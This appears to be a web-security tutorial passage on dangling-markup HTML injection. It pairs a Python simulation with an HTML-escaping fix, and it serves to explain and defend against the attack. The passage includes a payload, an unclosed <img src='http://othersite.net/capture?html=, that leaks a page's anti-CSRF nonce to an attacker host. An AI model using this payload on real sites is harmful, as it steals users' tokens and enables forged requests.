HTML injection

If the application's protection requires that all the actions be performed from a page on its own domain (a same-origin requirement, enforced in the example below with a per-request nonce embedded in the form), we can inject HTML into some part of the application in order to obtain what the request needs and execute the actions. These HTML injections don't necessarily need to be in a vulnerable field; sometimes the injection points are places where HTML is allowed by design, such as an email that accepts HTML, or a message board where HTML is permitted in comments. Let's check out the following code to see an example:

<form action="http://www.testsite.com/action.php" method="POST"> 
<!-- per-request anti-CSRF token that a forged request would need to know -->
<input type="hidden" name="nonce" value="2230313740821"> 
<input type="submit" value="Forward"> 
... 
</form> 
... 
<script> 
var _StatsTrackerId='AABBCCDDEEFF'; 
... 
</script> 

If we have this form on a page where we can also inject HTML (for example, above it in a comment), we can use an unclosed <img> tag as the attack, for example: <img src='http://othersite.net/capture?html= (note that the single quote that opens the src attribute is never closed). The browser then takes everything that follows in the page, up to the next single quote (the one in var _StatsTrackerId='), as the image URL, and requests it from othersite.net:

http://othersite.net/capture?html=<form%20action="http://www.testsite.com/action.php"%20method="POST"><input%20type="hidden"%20name="nonce"%20value="2230313740821"><input%20type="submit"%20value="Forward">...</form>...<script>%20var%20_StatsTrackerId=

Any check that the action is performed from testsite.com is satisfied, because the request to othersite.net is generated by the victim's browser while it renders the testsite.com page; the real target, however, is testsite.com. The nonce that was meant to stop requests forged from another site has now been delivered to othersite.net, and the attacker can build a request to http://www.testsite.com/action.php that carries the victim's valid nonce.
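The following is an added example, not code from the book: a small Python simulation of the attack above. It assumes a hypothetical board page (PAGE_TEMPLATE, with a comment slot placed before the form), a render_page() function that either HTML-escapes the comment or inserts it raw, a dangling_src() function that computes the URL a browser would request for the unclosed <img src='... tag, and an extract_nonce() function standing in for the attacker's capture endpoint. All of these names are assumptions for illustration.

```python
import html
import re
from urllib.parse import parse_qs, quote, urlsplit

# Constructed page: the form and tracker script from the text, preceded by a
# comment slot where user-supplied HTML lands (hypothetical board markup).
PAGE_TEMPLATE = """<div class="comment">{comment}</div>
<form action="http://www.testsite.com/action.php" method="POST">
<input type="hidden" name="nonce" value="2230313740821">
<input type="submit" value="Forward">
</form>
<script>
var _StatsTrackerId='AABBCCDDEEFF';
</script>
"""

CAPTURE_BASE = "http://othersite.net/capture?html="

# Dangling-markup payload: the src attribute is opened with a single quote
# that the attacker deliberately never closes.
PAYLOAD = "<img src='" + CAPTURE_BASE


def render_page(comment, escape=True):
    """Hypothetical board page. escape=False models the vulnerable site that
    inserts the comment raw; escape=True models the fixed site."""
    rendered = html.escape(comment, quote=True) if escape else comment
    return PAGE_TEMPLATE.format(comment=rendered)


def dangling_src(page):
    """Return the URL a browser would fetch for an <img src='... whose closing
    quote is supplied by the page itself, or None if no such tag exists.
    The attribute value runs up to the next single quote in the page."""
    m = re.search(r"<img src='", page)
    if m is None:
        return None
    start = m.end()
    end = page.find("'", start)
    if end == -1:
        return None  # no closing quote anywhere: nothing usable is requested
    raw = page[start:end]
    # Browsers strip ASCII tab/newline from a URL before resolving it, and
    # percent-encode the remaining unsafe characters (spaces, quotes, <, >).
    raw = raw.replace("\n", "").replace("\r", "").replace("\t", "")
    return quote(raw, safe=":/?=&")


def extract_nonce(capture_url):
    """What the attacker's capture endpoint does: decode the html= parameter
    and pull the anti-CSRF nonce out of the leaked markup."""
    params = parse_qs(urlsplit(capture_url).query)
    leaked = params.get("html", [""])[0]
    m = re.search(r'name="nonce" value="([^"]+)"', leaked)
    return m.group(1) if m else None


if __name__ == "__main__":
    vulnerable = render_page(PAYLOAD, escape=False)
    url = dangling_src(vulnerable)
    print("browser requests:", url)
    print("nonce captured by othersite.net:", extract_nonce(url))
    # With the comment HTML-escaped, no <img> tag is ever created.
    print("escaped page leaks:", dangling_src(render_page(PAYLOAD, escape=True)))
```

The simulation shows why the nonce alone does not help once HTML injection is possible: the leaking request is made by the victim's own browser from the testsite.com page, so the capture URL contains the victim's current nonce. The escape=True path shows the fix on the injection side, namely encoding user-supplied content so that a quote or angle bracket can never open a tag or an attribute.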
